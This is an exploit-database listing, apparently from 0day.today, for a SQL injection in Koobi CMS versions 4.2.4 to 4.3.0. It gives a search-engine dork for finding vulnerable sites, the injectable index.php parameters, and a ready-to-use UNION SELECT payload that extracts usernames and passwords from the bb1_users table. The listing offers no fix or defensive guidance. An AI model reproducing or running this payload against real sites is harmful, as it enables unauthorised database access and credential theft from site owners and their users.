[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Koobi CMS (index.php) SQL Injection Vulnerability

Author
SIL3NCIO
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13314
Category
web applications
Date add
12-07-2010
Platform
php
=================================================
Koobi CMS (index.php) SQL Injection Vulnerability 
=================================================

# Exploit Title :    Koobi CMS (index.php) SQL Injection Vulnerability
 
# Date :             July 12  2010
 
# Author :           SIL3NCIO
 
# Email :            617a6572@gmail.com
 
# Version:           4.3.0 & 4.2.5 & 4.2.4 Maybe Higher Versions are affected too
 
# Tested on:         Win Xp Sp3
 
# Dork :             inurl:"index.php?p=gallerypic img_id"
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Exploit~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
[Exploit] :  http://site.com/path/index.php?p=gallerypic&img_id=[SQLi]
 
-188+union+select+1,2,3,group_concat(username,0x3a,password),5,6,7,8,9+from+bb1_users--
 
http://site.com/path/index.php?p=showposter&p=misc&tid=[SQL]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Note : Proud to be Tunisian
 
[wrass la7nina sa7li]



#  0day.today [2024-11-16]  #